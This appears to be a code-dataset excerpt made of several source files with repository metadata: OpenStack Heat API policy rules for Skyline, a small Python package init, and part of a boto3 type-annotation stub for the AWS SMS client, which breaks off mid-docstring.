scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources/{resource_name}/metadata",
},
],
),
base.APIRule(
name="resource:signal",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or (role:heat_stack_user and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:heat_stack_user"
),
description="Signal resource.",
scope_types=["system", "project"],
operations=[
{
"method": "POST",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources/{resource_name}/signal",
},
],
),
base.APIRule(
name="resource:mark_unhealthy",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Mark resource as unhealthy.",
scope_types=["system", "project"],
operations=[
{
"method": "PATCH",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources/{resource_name_or_physical_id}",
},
],
),
base.APIRule(
name="resource:show",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show resource.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources/{resource_name}",
},
],
),
base.APIRule(
name="software_configs:global_index",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List configs globally.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/software_configs"}],
),
base.APIRule(
name="software_configs:index",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List configs.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/software_configs"}],
),
base.APIRule(
name="software_configs:create",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create config.",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/v1/{tenant_id}/software_configs"}],
),
base.APIRule(
name="software_configs:show",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show config details.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/software_configs/{config_id}"}],
),
base.APIRule(
name="software_configs:delete",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete config.",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/v1/{tenant_id}/software_configs/{config_id}"}],
),
base.APIRule(
name="software_deployments:index",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List deployments.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/software_deployments"}],
),
base.APIRule(
name="software_deployments:create",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create deployment.",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/v1/{tenant_id}/software_deployments"}],
),
base.APIRule(
name="software_deployments:show",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show deployment details.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/software_deployments/{deployment_id}"},
],
),
base.APIRule(
name="software_deployments:update",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update deployment.",
scope_types=["system", "project"],
operations=[
{"method": "PUT", "path": "/v1/{tenant_id}/software_deployments/{deployment_id}"},
],
),
base.APIRule(
name="software_deployments:delete",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete deployment.",
scope_types=["system", "project"],
operations=[
{"method": "DELETE", "path": "/v1/{tenant_id}/software_deployments/{deployment_id}"},
],
),
base.APIRule(
name="software_deployments:metadata",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or (role:heat_stack_user and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s or role:heat_stack_user"
),
description="Show server configuration metadata.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/software_deployments/metadata/{server_id}",
},
],
),
base.APIRule(
name="stacks:abandon",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Abandon stack.",
scope_types=["system", "project"],
operations=[
{
"method": "DELETE",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/abandon",
},
],
),
base.APIRule(
name="stacks:create",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create stack.",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/v1/{tenant_id}/stacks"}],
),
base.APIRule(
name="stacks:delete",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete stack.",
scope_types=["system", "project"],
operations=[
{"method": "DELETE", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}"},
],
),
base.APIRule(
name="stacks:detail",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List stacks in detail.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/stacks"}],
),
base.APIRule(
name="stacks:export",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Export stack.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/export"},
],
),
base.APIRule(
name="stacks:generate_template",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Generate stack template.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/template"},
],
),
base.APIRule(
name="stacks:global_index",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List stacks globally.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/stacks"}],
),
base.APIRule(
name="stacks:index",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List stacks.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/stacks"}],
),
base.APIRule(
name="stacks:list_resource_types",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="List resource types.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/resource_types"}],
),
base.APIRule(
name="stacks:list_template_versions",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="List template versions.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/template_versions"}],
),
base.APIRule(
name="stacks:list_template_functions",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="List template functions.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/template_versions/{template_version}/functions",
},
],
),
base.APIRule(
name="stacks:lookup",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or (role:heat_stack_user and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s or role:heat_stack_user"
),
description="Find stack.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_identity}"}],
),
base.APIRule(
name="stacks:preview",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Preview stack.",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/v1/{tenant_id}/stacks/preview"}],
),
base.APIRule(
name="stacks:resource_schema",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="Show resource type schema.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/resource_types/{type_name}"}],
),
base.APIRule(
name="stacks:show",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show stack.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_identity}"}],
),
base.APIRule(
name="stacks:template",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get stack template.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/template"},
],
),
base.APIRule(
name="stacks:environment",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get stack environment.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/environment",
},
],
),
base.APIRule(
name="stacks:files",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get stack files.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/files"},
],
),
base.APIRule(
name="stacks:update",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update stack.",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}"}],
),
base.APIRule(
name="stacks:update_patch",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update stack (PATCH).",
scope_types=["system", "project"],
operations=[
{"method": "PATCH", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}"},
],
),
base.APIRule(
name="stacks:update_no_change",
check_str=("rule:stacks:update_patch"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update stack (PATCH) with no changes.",
scope_types=["system", "project"],
operations=[
{"method": "PATCH", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}"},
],
),
base.APIRule(
name="stacks:preview_update",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Preview update stack.",
scope_types=["system", "project"],
operations=[
{"method": "PUT", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/preview"},
],
),
base.APIRule(
name="stacks:preview_update_patch",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Preview update stack (PATCH).",
scope_types=["system", "project"],
operations=[
{"method": "PATCH", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/preview"},
],
),
base.APIRule(
name="stacks:validate_template",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Validate template.",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/v1/{tenant_id}/validate"}],
),
base.APIRule(
name="stacks:snapshot",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Snapshot Stack.",
scope_types=["system", "project"],
operations=[
{
"method": "POST",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/snapshots",
},
],
),
base.APIRule(
name="stacks:show_snapshot",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show snapshot.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/snapshots/{snapshot_id}",
},
],
),
base.APIRule(
name="stacks:delete_snapshot",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete snapshot.",
scope_types=["system", "project"],
operations=[
{
"method": "DELETE",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/snapshots/{snapshot_id}",
},
],
),
base.APIRule(
name="stacks:list_snapshots",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List snapshots.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/snapshots"},
],
),
base.APIRule(
name="stacks:restore_snapshot",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Restore snapshot.",
scope_types=["system", "project"],
operations=[
{
"method": "POST",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/snapshots/{snapshot_id}/restore",
},
],
),
base.APIRule(
name="stacks:list_outputs",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List outputs.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/outputs"},
],
),
base.APIRule(
name="stacks:show_output",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show outputs.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/outputs/{output_key}",
},
],
),
)
__all__ = ("list_rules",)
| 39.303448 | 238 | 0.585015 | 4,733 | 39,893 | 4.717515 | 0.037397 | 0.157202 | 0.104801 | 0.165935 | 0.914636 | 0.897886 | 0.892646 | 0.884405 | 0.884405 | 0.881673 | 0 | 0.001979 | 0.265184 | 39,893 | 1,014 | 239 | 39.342209 | 0.759705 | 0.000301 | 0 | 0.765347 | 0 | 0.116832 | 0.538905 | 0.245593 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.00099 | 0 | 0.00099 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
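The heat.py module above is essentially declarative: list_rules is a tuple of Rule and APIRule objects, each pairing a policy name with an oslo.policy-style check string (APIRule entries additionally carry scope types and the API operations they guard). A small sketch of how that tuple could be inspected follows; the import path matches the repository path shown above, and it assumes the Rule objects expose their constructor fields (name, check_str) as attributes.

# Hypothetical inspection of the policy rules defined above.
from skyline_apiserver.policy.manager.heat import list_rules

# Map each policy name to its check string for quick lookup.
checks = {rule.name: rule.check_str for rule in list_rules}
print(checks["stacks:create"])
# Expected (per the definition above):
# (role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)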
20e42b0760bd695c7563d341bb64cc368a52c816 | 120 | py | Python | betfund_event_broker/__init__.py | betfund/betfund-event-broker | 524aec73d9cf66cbeeb0fab67e6816b836c1d98e | [
"MIT"
] | 1 | 2020-09-23T02:36:35.000Z | 2020-09-23T02:36:35.000Z | betfund_event_broker/__init__.py | betfund/betfund-event-broker | 524aec73d9cf66cbeeb0fab67e6816b836c1d98e | [
"MIT"
] | 5 | 2020-04-13T23:55:07.000Z | 2020-06-04T15:09:12.000Z | betfund_event_broker/__init__.py | betfund/betfund-event-broker | 524aec73d9cf66cbeeb0fab67e6816b836c1d98e | [
"MIT"
] | null | null | null | """Betfund Event Broker namespace."""
from .flows import * # noqa: F403, F401
from .tasks import * # noqa: F403, F401
| 30 | 40 | 0.675 | 16 | 120 | 5.0625 | 0.6875 | 0.246914 | 0.345679 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122449 | 0.183333 | 120 | 3 | 41 | 40 | 0.704082 | 0.55 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
45b6187791563009ae33d98d57ecf55f4ca74025 | 113,677 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/sms/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/sms/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/sms/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from datetime import datetime
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
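# Illustrative note, not part of the generated stub: the docstring above describes the
# standard botocore pagination check. In application code it would typically be used
# together with ``get_paginator``, e.g. (assuming the GetConnectors operation is paginated):
#
#     import boto3
#     client = boto3.client("sms")
#     if client.can_paginate("get_connectors"):
#         paginator = client.get_paginator("get_connectors")
#         for page in paginator.paginate():
#             print(page.get("connectorList", []))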
def create_app(self, name: str = None, description: str = None, roleName: str = None, clientToken: str = None, serverGroups: List = None, tags: List = None) -> Dict:
"""
Creates an application. An application consists of one or more server groups. Each server group contain one or more servers.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/CreateApp>`_
**Request Syntax**
::
response = client.create_app(
name='string',
description='string',
roleName='string',
clientToken='string',
serverGroups=[
{
'serverGroupId': 'string',
'name': 'string',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
]
},
],
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
**Response Syntax**
::
{
'appSummary': {
'appId': 'string',
'name': 'string',
'description': 'string',
'status': 'CREATING'|'ACTIVE'|'UPDATING'|'DELETING'|'DELETED'|'DELETE_FAILED',
'statusMessage': 'string',
'replicationStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_REPLICATION'|'VALIDATION_IN_PROGRESS'|'REPLICATION_PENDING'|'REPLICATION_IN_PROGRESS'|'REPLICATED'|'DELTA_REPLICATION_IN_PROGRESS'|'DELTA_REPLICATED'|'DELTA_REPLICATION_FAILED'|'REPLICATION_FAILED'|'REPLICATION_STOPPING'|'REPLICATION_STOP_FAILED'|'REPLICATION_STOPPED',
'replicationStatusMessage': 'string',
'latestReplicationTime': datetime(2015, 1, 1),
'launchStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_LAUNCH'|'VALIDATION_IN_PROGRESS'|'LAUNCH_PENDING'|'LAUNCH_IN_PROGRESS'|'LAUNCHED'|'DELTA_LAUNCH_IN_PROGRESS'|'DELTA_LAUNCH_FAILED'|'LAUNCH_FAILED'|'TERMINATE_IN_PROGRESS'|'TERMINATE_FAILED'|'TERMINATED',
'launchStatusMessage': 'string',
'launchDetails': {
'latestLaunchTime': datetime(2015, 1, 1),
'stackName': 'string',
'stackId': 'string'
},
'creationTime': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'roleName': 'string',
'totalServerGroups': 123,
'totalServers': 123
},
'serverGroups': [
{
'serverGroupId': 'string',
'name': 'string',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
]
},
],
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **appSummary** *(dict) --*
Summary description of the application.
- **appId** *(string) --*
Unique ID of the application.
- **name** *(string) --*
Name of the application.
- **description** *(string) --*
Description of the application.
- **status** *(string) --*
Status of the application.
- **statusMessage** *(string) --*
A message related to the status of the application
- **replicationStatus** *(string) --*
Replication status of the application.
- **replicationStatusMessage** *(string) --*
A message related to the replication status of the application.
- **latestReplicationTime** *(datetime) --*
Timestamp of the application's most recent successful replication.
- **launchStatus** *(string) --*
Launch status of the application.
- **launchStatusMessage** *(string) --*
A message related to the launch status of the application.
- **launchDetails** *(dict) --*
Details about the latest launch of the application.
- **latestLaunchTime** *(datetime) --*
Latest time this application was launched successfully.
- **stackName** *(string) --*
Name of the latest stack launched for this application.
- **stackId** *(string) --*
Identifier of the latest stack launched for this application.
- **creationTime** *(datetime) --*
Time of creation of this application.
- **lastModified** *(datetime) --*
Timestamp of the application's creation.
- **roleName** *(string) --*
Name of the service role in the customer's account used by AWS SMS.
- **totalServerGroups** *(integer) --*
Number of server groups present in the application.
- **totalServers** *(integer) --*
Number of servers present in the application.
- **serverGroups** *(list) --*
List of server groups included in the application.
- *(dict) --*
A logical grouping of servers.
- **serverGroupId** *(string) --*
Identifier of a server group.
- **name** *(string) --*
Name of a server group.
- **serverList** *(list) --*
List of servers belonging to a server group.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **tags** *(list) --*
List of tags associated with the application.
- *(dict) --*
A label that can be assigned to an application.
- **key** *(string) --*
Tag key.
- **value** *(string) --*
Tag value.
:type name: string
:param name:
Name of the new application.
:type description: string
:param description:
Description of the new application
:type roleName: string
:param roleName:
Name of service role in customer\'s account to be used by AWS SMS.
:type clientToken: string
:param clientToken:
A unique, case-sensitive identifier you provide to ensure idempotency of application creation.
:type serverGroups: list
:param serverGroups:
List of server groups to include in the application.
- *(dict) --*
A logical grouping of servers.
- **serverGroupId** *(string) --*
Identifier of a server group.
- **name** *(string) --*
Name of a server group.
- **serverList** *(list) --*
List of servers belonging to a server group.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
:type tags: list
:param tags:
List of tags to be associated with the application.
- *(dict) --*
A label that can be assigned to an application.
- **key** *(string) --*
Tag key.
- **value** *(string) --*
Tag value.
:rtype: dict
:returns:
"""
pass
def create_replication_job(self, serverId: str, seedReplicationTime: datetime, frequency: int = None, runOnce: bool = None, licenseType: str = None, roleName: str = None, description: str = None, numberOfRecentAmisToKeep: int = None, encrypted: bool = None, kmsKeyId: str = None) -> Dict:
"""
Creates a replication job. The replication job schedules periodic replication runs to replicate your server to AWS. Each replication run creates an Amazon Machine Image (AMI).
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/CreateReplicationJob>`_
**Request Syntax**
::
response = client.create_replication_job(
serverId='string',
seedReplicationTime=datetime(2015, 1, 1),
frequency=123,
runOnce=True|False,
licenseType='AWS'|'BYOL',
roleName='string',
description='string',
numberOfRecentAmisToKeep=123,
encrypted=True|False,
kmsKeyId='string'
)
**Response Syntax**
::
{
'replicationJobId': 'string'
}
**Response Structure**
- *(dict) --*
- **replicationJobId** *(string) --*
The unique identifier of the replication job.
:type serverId: string
:param serverId: **[REQUIRED]**
The identifier of the server.
:type seedReplicationTime: datetime
:param seedReplicationTime: **[REQUIRED]**
The seed replication time.
:type frequency: integer
:param frequency:
The time between consecutive replication runs, in hours.
